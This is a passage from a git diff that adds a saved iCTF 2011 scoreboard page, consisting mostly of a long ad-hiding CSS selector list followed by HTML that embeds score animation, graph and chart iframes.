advertorial_red,.advertorialtitle,.adverts,.adverts-125,.adverts_RHS,.advt,.advt-banner-3,.advt-block,.advt-sec,.advt300,.advt720,.advtitle,.adwhitespace,.adwordListings,.adwords,.adwordsHeader,.adwrap,.adwrapper-lrec,.adwrapper948,.adzone-footer,.adzone-sidebar,.affiliate-link,.affiliate-sidebar,.affiliateAdvertText,.affiliates-sidebar,.affinityAdHeader,.afsAdvertising,.after_ad,.agi-adsaleslinks,.alb-content-ad,.alignads,.alt_ad,.anchorAd,.another_text_ad,.answer_ad_content,.aolSponsoredLinks,.aopsadvert,.apiAdMarkerAbove,.apiAds,.app_advertising_skyscraper,.archive-ads,.art_ads,.article-ad-box,.article-ads,.article-content-adwrap,.articleAd,.articleAd300x250,.articleAds,.articleAdsL,.articleEmbeddedAdBox,.article_ad,.article_adbox,.article_mpu_box,.article_page_ads_bottom,.articleads,.aseadn,.aux-ad-widget-1,.aux-ad-widget-2,.b-astro-sponsored-links_horizontal,.b-astro-sponsored-links_vertical,.b_ads_cont,.b_ads_top,.banmanad,.banner-468-60,.banner-468x60,.banner-ad,.banner-ads,.banner-adv,.banner-advert,.banner-adverts,.banner-buysellads,.banner160x600,.banner300by250,.banner300x100,.banner300x250,.banner468,.banner468by60,.banner728x90,.bannerADV,.bannerAd,.bannerAdWrapper300x250,.bannerAdWrapper730x86,.bannerAds,.bannerAdvert,.bannerRightAd,.banner_160x600,.banner_300x250,.banner_728x90,.banner_ad,.banner_ad_footer,.banner_ad_leaderboard,.bannerad,.bannerad-125tower,.bannerad-468x60,.barkerAd,.base-ad-mpu,.base_ad,.base_printer_widgets_AdBreak,.bg-ad-link,.bgnavad,.big-ads,.bigAd,.big_ad,.big_ads,.bigad,.bigad2,.bigbox_ad,.bigboxad,.billboard300x250,.billboard_ad,.biz-ad,.biz-ads,.biz-adtext,.blk_advert,.block-ad,.block-ad300,.block-admanager,.block-ads-bottom,.block-ads-top,.block-adsense,.block-adsense-managed,.block-adspace-full,.block-bg-advertisement-region-1,.block-deca_advertising,.block-google-admanager,.block-google_admanager,.block-openads,.block-openadstream,.block-openx,.block-thirdage-ads,.block-wtg_adtech,.blockAd,.blockAds,.block_ad,.block_ad_floating_bar,.block_ad_sb_text,.block_ad_sb_text2,.block_ad_sponsored_links,.block_ad_sponsored_links-wrapper,.block_ad_sponsored_links_localized,.blockad,.blocked-ads,.blog-ad-leader-inner,.blog-ads-container,.blogAd,.blogAdvertisement,.blogArtAd,.blogBigAd,.blog_ad,.blogads,.blox3featuredAd,.bn_textads,.body_ad,.body_sponsoredresults_bottom,.body_sponsoredresults_middle,.body_sponsoredresults_top,.bodyads,.bodyads2,.bookseller-header-advt,.bottom-ad,.bottom-ad-fr,.bottom-ads,.bottomAd,.bottomAds,.bottom_ad,.bottom_ad_block,.bottom_ads,.bottom_adsense,.bottom_right_ad,.bottomad,.bottomads,.bottomadvert,.bottombarad,.bottomrightrailAd,.bottomvidad,.box-ad,.box-ad-grey,.box-ads,.box-ads-small,.box-adsense,.box-adverts,.boxAd,.boxAds,.boxAdsInclude,.box_ad,.box_ad_container,.box_ad_content,.box_ad_spacer,.box_ad_wrap,.box_ads,.box_adv,.box_adv_new,.box_advertising,.box_advertisment_62_border,.box_content_ad,.box_content_ads,.box_textads,.boxad,.boxads,.boxyads,.bps-ad-wrapper,.bps-advertisement,.bps-advertisement-inline-ads,.br-ad,.breakad_container,.brokerad,.bsa_ads,.btm_ad,.btm_ad_container,.btn-ad,.bullet-sponsored-links,.bullet-sponsored-links-gray,.burstContentAdIndex,.busrep_poll_and_ad_container,.buttonAd,.buttonAds,.button_ads,.button_advert,.buttonadbox,.buttonads,.bx_ad,.bx_ad_right,.cA-adStrap,.cColumn-TextAdsBox,.cLeftTextAdUnit,.c_ligatus_nxn,.calendarAd,.calloutAd,.carbonad,.carbonad-tag,.care2_adspace,.catalog_ads,.category-ad,.categorySponsorAd,.category__big_game_container_body_games_advertising,.cb-ad-banner,.cb-ad-container,.cb_ads,.cb_navigation_ad,.cbstv_ad_label,.cbzadvert,.cbzadvert_block,.cdAdTitle,.cdmainlineSearchAdParent,.cdo-ad-section,.cdsidebarSearchAdParent,.centerAd,.center_ad,.centerad,.centered-ad,.chitikaAdCopy,.cinemabotad,.classifiedAdThree,.clearerad,.cmAdContainer,.cmAdFind,.cmAdSponsoredLinksBox,.cm_ads,.cms-Advert,.cnbc_badge_banner_ad_area,.cnbc_banner_ad_area,.cnbc_leaderboard_ad,.cnn160AdFooter,.cnnAd,.cnnMosaic160Container,.cnnStoreAd,.cnnStoryElementBoxAd,.cnnWCAdBox,.cnnWireAdLtgBox,.cnn_728adbin,.cnn_adcntr300x100,.cnn_adcntr728x90,.cnn_adspc336cntr,.cnn_adtitle,.cntrad,.column2-ad,.columnBoxAd,.columnRightAdvert,.com-ad-server,.comment-ad,.comment-ad-wrap,.comment-advertisement,.comment_ad_box,.common_advertisement_title,.communityAd,.conTSponsored,.conductor_ad,.confirm_ad_left,.confirm_ad_right,.confirm_leader_ad,.consoleAd,.container-adwords,.containerSqAd,.container_serendipity_plugin_google_adsense,.content-ad,.content-ads,.content-advert,.contentAd,.contentAdContainer,.contentAdFoot,.contentAdsWrapper,.content_ad,.content_ad_728,.content_adsense,.content_adsq,.content_tagsAdTech,.contentad,.contentad-home,.contentad300x250,.contentad_right_col,.contentadcontainer,.contentadfloatl,.contentadleft,.contentads,.contentadstartpage,.contents-ads-bottom-left,.contenttextad,.contest_ad,.cp_ad,.cpmstarHeadline,.cpmstarText,.create_ad,.cs-mpu,.cscTextAd,.cse_ads,.cspAd,.ct_ad,.ctnAdSkyscraper,.ctnAdSquare300,.cube-ad,.cubeAd,.cube_ads,.currency_ad,.custom_ads,.cwAdvert,.cxAdvertisement,.darla_ad,.dart-ad,.dartAdImage,.dart_ad,.dart_tag,.dartadvert,.dartiframe,.dc-ad,.dcAdvertHeader,.deckAd,.deckads,.detail-ads,.detailMpu,.detail_ad,.detail_top_advert,.dfrads,.displayAdSlot,.divAd,.divAdright,.div_adv300,.div_advstrip,.divad1,.divad2,.divad3,.divads,.divider_ad,.dlSponsoredLinks,.dmco_advert_iabrighttitle,.downloadAds,.download_ad,.downloadad,.dsq_ad,.dualAds,.dynamic-ads,.dynamic_ad,.e-ad,.ec-ads,.ec-ads-remove-if-empty,.em-ad,.em_ads_box_dynamic_remove,.embed-ad,.embeddedAd,.entry-body-ad,.entry-injected-ad,.entry_sidebar_ads,.entryad,.ez-clientAd,.f_Ads,.feature_ad,.featuredAds,.featured_ad,.featuredadvertising,.fireplaceadleft,.fireplaceadright,.fireplaceadtop,.firstpost_advert_container,.flagads,.flash-advertisement,.flash_ad,.flash_advert,.flashad,.flexiad,.flipbook_v2_sponsor_ad,.floatad,.floated_right_ad,.floatingAds,.fm-badge-ad,.fns_td_wrap,.fold-ads,.footad,.footer-ad,.footer-advert,.footerAd,.footerAdModule,.footerAds,.footerAdslot,.footerAdverts,.footerTextAd,.footer_ad,.footer_ad336,.footer_ads,.footer_block_ad,.footer_bottomad,.footer_line_ad,.footer_text_ad,.footerad,.forumtopad,.freedownload_ads,.frn_adbox,.frn_cont_adbox,.frontads,.frontpage-google-ad,.ft-ad,.ftdAdBar,.ftdContentAd,.full_ad_box,.full_width_ad,.fullbannerad,.g3rtn-ad-site,.gAdRows,.gAdSky,.gAdvertising,.g_ggl_ad,.ga-ads,.ga-textads-bottom,.ga-textads-top,.gaTeaserAds,.gaTeaserAdsBox,.gads_cb,.gads_container,.gallery_ad,.gam_ad_slot,.gameAd,.gamesPage_ad_content,.gbl_advertisement,.gen_side_ad,.gglAds,.global_banner_ad,.googad,.googads,.google-ad,.google-ad-container,.google-ads,.google-ads-boxout,.google-ads-slim,.google-adsense,.google-right-ad,.google-sponsored-ads,.google-sponsored-link,.google468,.google468_60,.googleAd,.googleAd-content,.googleAd-list,.googleAd300x250_wrapper,.googleAdBox,.googleAdSense,.googleAdSenseModule,.googleAd_body,.googleAds,.googleAds_article_page_above_comments,.googleAdsense,.googleContentAds,.googleProfileAd,.googleSearchAd_content,.googleSearchAd_sidebar,.google_ad,.google_ad_wide,.google_add_container,.google_ads,.google_ads_bom_title,.google_ads_content,.google_adsense_footer,.googlead,.googleaddiv,.googleaddiv2,.googleads,.googleads_300x250,.googleads_title,.googleadsense,.googleafc,.googley_ads,.gpAdBox,.gpAds,.gradientAd,.grey-ad-line,.group_ad,.gsAd,.gsfAd,.gt_ad,.gt_ad_300x250,.gt_ad_728x90,.gt_adlabel,.gutter-ad-left,.gutter-ad-right,.gx_ad,.h-ad-728x90-bottom,.h_Ads,.h_ad,.half-ad,.half_ad_box,.hcf-ad,.hcf-ad-rectangle,.hcf-cms-ad,.hd_advert,.hdr-ads,.head_ad,.header-ad,.header-advert,.header-google-ads,.header-taxonomy-image-sponsor,.headerAd,.headerAdCode,.headerAds,.headerAdvert,.headerTextAd,.header_ad,.header_ad_center { display:none !important; } .header_ad_div,.header_ads,.header_advertisement,.header_advertisment,.headerad,.headerad-720,.hi5-ad,.highlightsAd,.hm_advertisment,.hn-ads,.home-ad-links,.homeAd,.homeAd1,.homeAd2,.homeAdBoxA,.homeAdBoxBetweenBlocks,.homeAdBoxInBignews,.homeAdSection,.homeMediumAdGroup,.home_ad_bottom,.home_advertisement,.home_advertorial,.home_mrec_ad,.homead,.homepage-ad,.homepage300ad,.homepageFlexAdOuter,.homepageMPU,.homepage_middle_right_ad,.homepageinline_adverts,.hor_ad,.horiz_adspace,.horizontalAd,.horizontal_ad,.horizontal_ads,.horizontaltextadbox,.horizsponsoredlinks,.hortad,.houseAd1,.houseAdsStyle,.housead,.hoverad,.hp-col4-ads,.hp2-adtag,.hp_ad_cont,.hp_ad_text,.hp_t_ad,.hp_w_ad,.hpa-ad1,.html-advertisement,.ic-ads,.ico-adv,.idMultiAd,.iframe-ad,.image-advertisement,.imageAd,.imageads,.imgad,.in-page-ad,.in-story-ads,.in-story-text-ad,.inStoryAd-news2,.indEntrySquareAd,.indie-sidead,.indy_googleads,.infoBoxThreadPageRankAds,.inhousead,.inline-ad,.inline-mpu,.inline-mpu-left,.inlineSideAd,.inline_ad,.inline_ad_title,.inlinead,.inlineadsense,.inlineadtitle,.inlist-ad,.inlistAd,.inner-advt-banner-3,.innerAds,.innerad,.inpostad,.insert_advertisement,.insertad,.insideStoryAd,.inteliusAd_image,.interest-based-ad,.internalAdsContainer,.iprom-ad,.is24-adplace,.isAd,.islandAd,.islandAdvert,.islandad,.itemAdvertise,.jimdoAdDisclaimer,.jp-advertisment-promotional,.js-advert,.kdads-empty,.kdads-link,.kw_advert,.kw_advert_pair,.l_ad_sub,.label-ad,.labelads,.largeRecAdNewsContainerRight,.largeRectangleAd,.largeUnitAd,.large_ad,.lastRowAd,.lazyload_ad,.lcontentbox_ad,.leadAd,.leaderAdSlot,.leaderAdTop,.leaderAdvert,.leaderBoardAdHolder,.leaderOverallAdArea,.leader_ad,.leaderboardAd,.leaderboardAdContainer,.leaderboardAdContainerInner,.leaderboard_ad,.leaderboardad,.leaderboardadtop,.left-ad,.left-advert,.leftAd,.leftAdColumn,.leftAds,.left_ad,.left_ad_box,.left_adlink,.left_ads,.left_adsense,.leftad,.leftadtag,.leftbar_ad_160_600,.leftbarads,.leftbottomads,.leftnavad,.lgRecAd,.lg_ad,.ligatus,.linead,.link_adslider,.link_advertise,.live-search-list-ad-container,.livingsocial-ad,.ljad,.local-ads,.log_ads,.logoAds,.logoad,.logoutAd,.longAd,.longAdBox,.lowerAds,.lr-ad,.m-ad-tvguide-box,.m4-adsbygoogle,.m_banner_ads,.macAd,.macad,.main-ad,.main-advert,.main-tabs-ad-block,.mainAd,.mainLeftAd,.mainLinkAd,.mainRightAd,.main_ad,.main_ad_bg_div,.main_adbox,.main_ads,.main_intro_ad,.map_media_banner_ad,.marginadsthin,.marketing-ad,.masthead_topad,.matador_sidebar_ad_600,.mdl-ad,.media-advert,.mediaAd,.mediaAdContainer,.mediaResult_sponsoredSearch,.medium-rectangle-ad,.mediumRectangleAdvert,.medium_ad,.medrect_ad,.member-ads,.menuItemBannerAd,.menueadimg,.messageBoardAd,.mf-ad300-container,.micro_ad,.mid_ad,.mid_page_ad,.midad,.middle-ad,.middleAds,.middlead,.middleads,.min_navi_ad,.mini-ad,.miniad,.miscAd,.mmc-ad,.mmcAd_Iframe,.mod-ad-lrec,.mod-ad-n,.mod-adopenx,.mod-vertical-ad,.mod_admodule,.module-ad,.module-ad-small,.module-ads,.module-advertisement,.module-sponsored-ads,.moduleAd,.moduleAdvertContent,.module_ad,.module_box_ad,.modulegad,.moduletable-advert,.moduletable-googleads,.moduletablesquaread,.mos-ad,.mpu-ad,.mpu-ad-con,.mpu-advert,.mpu-footer,.mpu-fp,.mpu-title,.mpu-top-left,.mpu-top-left-banner,.mpu-top-right,.mpu01,.mpuAd,.mpuAdSlot,.mpuAdvert,.mpuArea,.mpuBox,.mpuContainer,.mpuHolder,.mpuTextAd,.mpu_ad,.mpu_advert,.mpu_container,.mpu_gold,.mpu_holder,.mpu_platinum,.mpu_side,.mpu_text_ad,.mpuad,.mpuholderportalpage,.mrec_advert,.ms-ads-link,.msfg-shopping-mpu,.mvw_onPageAd1,.mwaads,.my-ad250x300,.nSponsoredLcContent,.nSponsoredLcTopic,.nadvt300,.narrow_ad_unit,.narrow_ads,.navAdsBanner,.navBads,.nav_ad,.navadbox,.navcommercial,.navi_ad300,.naviad,.nba300Ad,.nbaT3Ad160,.nbaTVPodAd,.nbaTwo130Ads,.nbc_ad_carousel_wrp,.newPex_forumads,.newTopAdContainer,.newad,.newsAd,.news_article_ad_google,.newsviewAdBoxInNews,.newsvinemsn_adtype,.nexusad,.nf-adbox,.nn-mpu,.noAdForLead,.normalAds,.nrAds,.nsAdRow,.nu2ad,.oas-ad,.oas-bottom-ads,.oas_ad,.oas_advertisement,.offer_sponsoredlinks,.oio-banner-zone,.oio-link-sidebar,.oio-zone-position,.on_single_ad_box,.onethirdadholder,.openads,.openadstext_after,.openx,.openx-ad,.openx_ad,.osan-ads,.other_adv2,.outermainadtd1,.ovAdPromo,.ovAdSky,.ovAdartikel,.ov_spns,.ovadsenselabel,.pageAds,.pageBottomGoogleAd,.pageGoogleAd,.pageGoogleAdFlat,.pageGoogleAdSubcontent,.pageGoogleAds,.pageGoogleAdsContainer,.pageLeaderAd,.page_content_right_ad,.pagead,.pageads,.pagenavindexcontentad,.paneladvert,.partner-ad,.partner-ads-container,.partnerAd,.partnersTextLinks,.pencil_ad,.player_ad_box,.player_hover_ad,.player_page_ad_box,.plista_inimg_box,.pm-ad,.pmad-in2,.pnp_ad,.pod-ad-300,.podRelatedAdLinksWidget,.podSponsoredLink,.portalCenterContentAdBottom,.portalCenterContentAdMiddle,.portalCenterContentAdTop,.portal_searchresultssponsoredlist,.portalcontentad,.post-ad,.postAd,.post_ad,.post_ads,.post_sponsor_unit,.postbit_adbit_register,.postbit_adcode,.postgroup-ads,.postgroup-ads-middle,.prebodyads,.premium_ad_container,.promoAd,.promoAds,.promo_ad,.promoboxAd,.promotionTextAd,.ps-ligatus_placeholder,.pub_300x250,.pub_300x250m,.pub_728x90,.publication-ad,.publicidad,.puff-advertorials,.qa_ad_left,.qm-ad-content,.qm-ad-content-news,.quigo-ad,.qzvAdDiv,.r_ad_1,.r_ad_box,.r_ads,.rad_container,.rect_ad_module,.rectad,.rectangle-ad,.rectangleAd,.rectanglead,.redads_cont,.referrerDetailAd,.regular_728_ad,.regularad,.relatedAds,.related_post_google_ad,.relatesearchad,.remads,.resourceImagetAd,.result_ad,.reviewMidAdvertAlign,.rght300x250,.rhads,.rhs-ad,.rhs-ads-panel,.rhs-advert-container,.rhs-advert-link,.rhs-advert-title,.right-ad,.right-ad-holder,.right-ad2,.right-ads,.right-ads2,.right-sidebar-box-ad,.rightAd,.rightAdBox,.rightAdverts,.rightColAd,.rightColumnRectAd,.rightRailAd,.right_ad,.right_ad_160,.right_ad_box,.right_ad_common_block,.right_ad_text,.right_ad_top,.right_ads,.right_ads_column,.right_box_ad_rotating_container,.right_col_ad,.right_hand_advert_column,.right_side-partyad,.rightad,.rightad_1,.rightad_2,.rightadbox1,.rightads,.rightadunit,.rightbigcolumn_ads,.rightbigcolumn_ads_nobackground,.rightcol_boxad,.rightcoladvert,.rightcoltowerad,.rightmenu_ad,.rnav_ad,.rngtAd,.rot_ads,.round_box_advert,.roundedCornersAd,.roundingrayboxads,.rt_ad1_300x90,.rt_ad_300x250,.rt_ad_call,.s2k_ad,.savvyad_unit,.sb-ad-sq-bg,.sbAd,.sbAdUnitContainer,.sb_ad_holder,.sb_adsN,.sb_adsNv2,.sb_adsW,.sb_adsWv2,.scanAd,.scc_advert,.sci-ad-main,.sci-ad-sub,.search-ad,.search-results-ad,.search-sponsor,.search-sponsored,.searchAd,.searchAdTop,.searchAds,.searchSponsoredResultsBox,.searchSponsoredResultsList,.search_column_results_sponsored,.search_results_sponsored_top,.section-ad2,.section_mpu_wrapper,.section_mpu_wrapper_wrapper,.selfServeAds,.sepContentAd,.serp_sponsored,.servsponserLinks,.shoppingGoogleAdSense,.showAd_No,.showAd_Yes,.showcaseAd,.sidbaread,.side-ad,.side-ads,.side-sky-banner-160,.sideAd,.sideBoxAd,.side_ad,.side_ad2,.side_ad_1,.side_ad_2,.side_ad_3,.sidead,.sideads,.sideadsbox,.sideadvert,.sidebar-ad,.sidebar-ads,.sidebar-content-ad,.sidebar-text-ad,.sidebarAd,.sidebarAdUnit,.sidebarAdvert,.sidebar_ad,.sidebar_ad_300_250,.sidebar_ads,.sidebar_ads_336,.sidebar_adsense,.sidebar_box_ad,.sidebarad,.sidebarad_bottom,.sidebaradbox,.sidebarads,.sidebarboxad,.sideheadnarrowad,.sideheadsponsorsad,.simple_ads_manager_widget,.single-google-ad,.singleAd,.singleAdsContainer,.single_ad,.singlead,.singleadstopcstm2,.site_ad_120_600,.site_ad_300x250,.sitesponsor,.skinAd,.skin_ad_638,.sky-ad,.skyAd,.skyAdd,.skyAdvert,.skyAdvert2,.sky_ad,.sky_scraper_ad,.skyad,.skyjobsadtext,.skyscraper-ad,.skyscraper_ad,.skyscraper_bannerAdHome,.sleekadbubble,.slideshow-ad,.slpBigSlimAdUnit,.slpSquareAdUnit,.sm_ad,.smallSkyAd1,.smallSkyAd2,.small_ad,.small_ads,.smallad-left,.smallads,.smallsponsorad,.smart_ads_bom_title,.spLinks,.specialAd175x90,.speedyads,.sphereAdContainer,.spl-ads,.spl_ad,.spl_ad2,.spl_ad_plus,.splitAd,.splitAdResultsPane,.sponlinkbox,.spons-link,.spons_links,.sponslink,.sponsor-ad,.sponsor-link,.sponsor-links,.sponsor-services,.sponsorPanel,.sponsorPost,.sponsorPostWrap,.sponsorStrip,.sponsor_ad_area,.sponsor_area,.sponsor_bar,.sponsor_columns,.sponsor_footer,.sponsor_line,.sponsor_links,.sponsor_logo,.sponsoradtitle,.sponsored-ads,.sponsored-chunk,.sponsored-editorial,.sponsored-features,.sponsored-links,.sponsored-links-alt-b,.sponsored-links-holder,.sponsored-links-right,.sponsored-post,.sponsored-post_ad,.sponsored-results,.sponsored-right-border,.sponsored-text,.sponsoredBox,.sponsoredInfo,.sponsoredInner,.sponsoredLabel,.sponsoredLink,.sponsoredLinks,.sponsoredLinks2,.sponsoredLinksHeader,.sponsoredProduct,.sponsoredResults,.sponsoredSideInner,.sponsored_ads,.sponsored_box,.sponsored_box_search,.sponsored_by,.sponsored_link,.sponsored_links,.sponsored_links_title_container,.sponsored_links_title_container_top,.sponsored_links_top,.sponsored_result,.sponsored_results,.sponsored_ss,.sponsored_well,.sponsoredibbox,.sponsoredlink,.sponsoredlinks,.sponsoredlinkscontainer,.sponsoredresults,.sponsoredtextlink_container_ovt,.sponsoring_link,.sponsorlink,.sponsorlink2,.sponsormsg,.sport-mpu-box,.spotlightAd,.squareAd,.square_ad,.square_banner_ad,.squared_ad,.ss-ad-banner,.ss-ad-mpu,.standard-ad,.start__newest__big_game_container_body_games_advertising,.staticAd,.stickyAdLink,.stock-ticker-ad-tag,.stocks-ad-tag,.store-ads,.story_AD,.story_ad_div,.story_right_adv,.storyad,.subad,.subadimg,.subcontent-ad,.subtitle-ad-container,.sugarad,.super-ad,.supercommentad_left,.supercommentad_right,.supp-ads,.supportAdItem,.surveyad,.t10ad,.tab_ad,.tab_ad_area,.tablebordersponsor,.tadsanzeige,.tadsbanner,.tadselement,.tallad,.tblTopAds,.tbl_ad,.tbox_ad,.td-Adholder,.td-TrafficWeatherWidgetAdGreyBrd,.teaser-sponsor,.teaserAdContainer,.teaser_adtiles,.teaser_advert_content,.text-ad,.text-ad-links,.text-ads,.text-advertisement,.text-g-advertisement,.text-g-group-short-rec-ad,.text-g-net-grp-google-ads-article-page,.textAd,.textAdBox,.textAds,.text_ad,.text_ads,.textad,.textadContainer,.textad_headline,.textadbox,.textadheadline,.textadlink,.textads,.textads_left,.textads_right,.textadsds,.textadsfoot,.textadtext,.textadtxt,.textadtxt2,.textlink-ads,.textlinkads,.tf_page_ad_search,.thirdage_ads_300x250,.thirdage_ads_728x90,.thisIsAd,.thisIsAnAd,.ticket-ad,.tileAds,.tips_advertisement,.title-ad,.title_adbig,.tncms-region-ads,.toolad,.toolbar-ad,.top-ad,.top-ad-space,.top-ads,.top-banner-ad,.top-left-nav-ad,.top-menu-ads,.topAd,.topAdWrap,.topAds,.topAdvertisement,.topAdverts,.topBannerAd,.topLeaderboardAd,.top_Ad,.top_ad,.top_ad1,.top_ad_728,.top_ad_728_90,.top_ad_disclaimer,.top_ad_div,.top_ad_post,.top_ad_wrapper,.top_ads,.top_advert,.top_advertisement,.top_advertising_lb,.top_bar_ad,.top_container_ad,.topad,.topad-bar,.topadbox,.topads,.topadspot,.topadvertisementsegment,.topboardads,.topcontentadvertisement,.topic_inad,.topstoriesad,.toptenAdBoxA,.tourFeatureAd,.tower-ad,.towerAd,.towerAdLeft,.towerAds,.tower_ad,.tower_ad_disclaimer,.towerad,.tr-ad-adtech-placement,.tribal-ad,.ts-ad_unit_bigbox,.ts-banner_ad,.ttlAdsensel,.tto-sponsored-element,.tucadtext,.tvs-mpu,.twoColumnAd,.twoadcoll,.twoadcolr,.tx_smartadserver_pi1,.txt-ads,.txtAd,.txtAds,.txt_ads,.txtadvertise,.type_adscontainer,.type_miniad,.type_promoads,.ukAds,.ukn-banner-ads,.under_ads,.undertimyads,.unit-ad,.universalboxADVBOX01,.universalboxADVBOX03,.universalboxADVBOX04a,.usenext,.v5rc_336x280ad,.vert-ads,.vert-adsBlock,.vertad,.vertical-adsense,.vidadtext,.videoAd,.videoBoxAd,.video_ad,.view-promo-mpu-right,.view_rig_ad,.virgin-mpu,.wa_adsbottom,.wantads,.weather_ad,.webads336x280,.wide-ad,.wide-advert,.wide-skyscraper-ad,.wideAd,.wideAdTable,.wide_ad,.wide_ad_unit_top,.wide_ads,.wide_google_ads,.widget-ad,.widget-ad-codes,.widget-ad300x250,.widget-entry-ads-160,.widgetYahooAds,.widget_ad,.widget_ad_boxes_widget,.widget_ad_rotator,.widget_adrotate_widgets,.widget_advert_widget,.widget_econaabachoadswidget,.widget_island_ad,.widget_maxbannerads,.widget_sdac_bottom_ad_widget,.widget_sdac_footer_ads_widget,.widget_sdac_skyscraper_ad_widget,.wikia-ad,.wikia_ad_placeholder,.wingadblock,.withAds,.wl-ad,.wnMultiAd,.wp125_write_ads_widget,.wp125ad,.wp125ad_2,.wpn_ad_content,.wrap-ads,.wrapper-ad,.wrapper-ad-sidecol,.wsSponsoredLinksRight,.wsTopSposoredLinks,.x03-adunit,.x04-adunit,.x81_ad_detail,.xads-blk-top-hld,.xads-blk2,.xads-ojedn,.y-ads,.y-ads-wide,.y7-advertisement,.yahoo-sponsored,.yahoo-sponsored-links,.yahooAd,.yahooAds,.yahoo_ads,.yahooad,.yahooad-image,.yahooad-urlline,.yan-sponsored,.ygrp-ad,.yom-ad,.youradhere,.yrail_ad_wrap,.yrail_ads,.ysmsponsor,.ysponsor,.yw-ad,.zRightAdNote,a[href*="/adrotate/adrotate-out.php?"],a[href^="http://ad-apac.doubleclick.net/"],a[href^="http://ad-emea.doubleclick.net/"],a[href^="http://ad.doubleclick.net/"],a[href^="http://ads.pheedo.com/"],a[href^="http://adserving.liveuniversenetwork.com/"],a[href^="http://api.ringtonematcher.com/"],a[href^="http://galleries.pinballpublishernetwork.com/"],a[href^="http://galleries.securewebsiteaccess.com/"],a[href^="http://install.securewebsiteaccess.com/"],a[href^="http://latestdownloads.net/download.php?"],a[href^="http://secure.signup-page.com/"],a[href^="http://secure.signup-way.com/"],a[href^="http://www.FriendlyDuck.com/AF_"],a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"],a[href^="http://www.firstload.de/affiliate/"],a[href^="http://www.friendlyduck.com/AF_"],a[href^="http://www.google.com/aclk?"],a[href^="http://www.liutilities.com/aff"],a[href^="http://www.liutilities.com/products/campaigns/adv/"],a[href^="http://www.my-dirty-hobby.com/?sub="],a[href^="http://www.ringtonematcher.com/"],#mbEnd[cellspacing="0"][cellpadding="0"],#mclip_container:last-child,#ssmiwdiv[jsdisplay],#tads.c,#tadsb.c,#tadsto.c,.ch[onclick="ga(this,event)"],.ra[align="left"][width="30%"],.ra[align="right"][width="30%"],div[style="background:#fbf0fa;margin:0 0 14px;min-height:0;padding-top:2px;padding-bottom:1px;padding-right:8px;padding-left:7px"],#WerbungObenRechts10_GesamtDIV,#WerbungObenRechts8_GesamtDIV,#WerbungObenRechts9_GesamtDIV,#WerbungUntenLinks4_GesamtDIV,#WerbungUntenLinks7_GesamtDIV,#WerbungUntenLinks8_GesamtDIV,#WerbungUntenLinks9_GesamtDIV,#Werbung_Content,#Werbung_Sky,#Werbung_Wide,#__ligatus_placeholder__,#ad-bereich1-08,#ad-bereich1-superbanner,#ad-bereich2-08,#ad-bereich2-skyscrapper,#ad-rechts-block,#ad-rechts-sky,#ad_gross,#ad_lang,#ad_oben,#ad_rechts,#adbox_artikel,#adkontainer,#anzeigewerbungtext,#ar_detail_werb103,#bannerwerbung,#callya_freikarte_layer,#cnt_bgwerbung,#cont-werb,#forumformwerbung,#freikarte_layer,#gonamicerror,#header_werbung,#headerwerbung,#kaufDA,#kaufDA-widget-container,#kopf-werbung,#lieferando-widget-container,#moveable_werbung,#p-links-werbung,#p-rechts-werbung,#qm_content_ad_anzeige,#reklame,#startwerbung,#t_werbung,#textwerbung,#topwerbung,#werbLayer1,#werbLayer2,#werbLayer3,#werb_ps103,#werbeadd,#werbebalken_slot,#werbebanner,#werbeblock,#werbebox,#werbebox_contentad,#werbecontainer_content,#werbecontainer_sky,#werbeflaeche,#werbetrenner,#werbung,#werbung-left,#werbung-skyscraper,#werbung1,#werbung2,#werbung3,#werbung792_2,#werbungSuperbanner,#werbung_bigsize,#werbung_footer,#werbung_mitte,#werbung_rechts,#werbung_right,#werbung_top,#werbunglink,#werbungrechts,#werbungsky,#wkr_werbung,.Artikel_Ads_News,.KomischeWerbeBox,.RessortWerbungHeader,.Werbeteaser,.Werbung,.WerbungAdpepper { display:none !important; } .WerbungDetailRectangle,.WerbungLinksRechts,.WerbungMitte,.ad_mitte,.ads_rechts,.adzeiger,.anzeigenwerbung,.bannerAnzeige,.bdeFotoGalAd,.bdeFotoGalAdText,.big-werb,.block_rs4_werbung,.bottom-werbung-box,.box_werbung_detailseite,.boxstartwerbung,.boxwerb,.boxwerbung,.content_body_right_werbung,.content_header_werbung,.content_right_side_werbewrapper,.contentwerbung4,.ecom_werbung,.firstload,.fullbanner_werbung,.gutZuWissenAd,.insidewerbung,.lokalwerbung,.rahmen_ad,.reklame,.right-content-werbung,.seitenleiste_werbung,.sponsorinaktiv,.sponsorlinkgruen,.tab_artikelwerbung,.teaser_adliste,.text_werbung,.textad_hauptlink,.topwerbung,.werbeadd_ueber,.werbebanner,.werbeflaeche,.werbung,.werbung-bigbox,.werbung-bigsize,.werbung-content,.werbung-contentad,.werbung-fullbanner,.werbung-halfbanner,.werbung-label,.werbung-leiste,.werbung-rectangle,.werbung-skyscraper,.werbung-skyscraper2,.werbung1,.werbung2,.werbung3,.werbung300,.werbung301,.werbungAnzeige,.werbungTabelle,.werbung_bereich,.werbungamazon,a[href^="http://farm.plista.com/pets"],a[href^="http://shortnews.de/gotoklick.cfm?fr_campaign_adtext_id="],a[href^="http://www.eis.de/index.phtml?refid="],a[href^="http://www.firstload.de/index.php?set_lang=de&log="],a[href^="http://www.top-of-software.de/"],a[href^="https://farm.plista.com/pets"],input[onclick^="window.open('http://www.firstload.de/affiliate/"] { display:none !important; }</style><body><div class="ictf_header"> +<center>iCTF 2011 Scoreboard</center> +</div> + + + + + +<div class="main"> +<table class="dashboard"> +<tbody><tr><td class="td_radar"> +<div class="radar"> +<iframe id="radar" src="./scoreboard.ictf2011.info_files/score-anim.html" width="100%" height="100%" scrolling="no" frameborder="0"> + <p>Your browser does not support iframes. </p> +</iframe> +</div> +</td><td class="td_graph"> +<div class="graph"> +<iframe id="id-score-graph" src="./scoreboard.ictf2011.info_files/score-graph.html" width="100%" height="100%" scrolling="no" frameborder="0"> + <p>Your browser does not support iframes. </p> +</iframe> +</div> +</td> +</tr> +</tbody></table> + +<div class="chart"> +<iframe src="./scoreboard.ictf2011.info_files/score-chart.html" width="100%" height="100%" scrolling="no" frameborder="0"> + <p>Your browser does not support iframes.</p> +</iframe> +</div> + +<div id="footer"> +</div> + + + +</div></body></html> +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011.info_files/._129.jpg b/ictf2011/scoreboard.ictf2011.info_files/._129.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info_files/._130.jpg 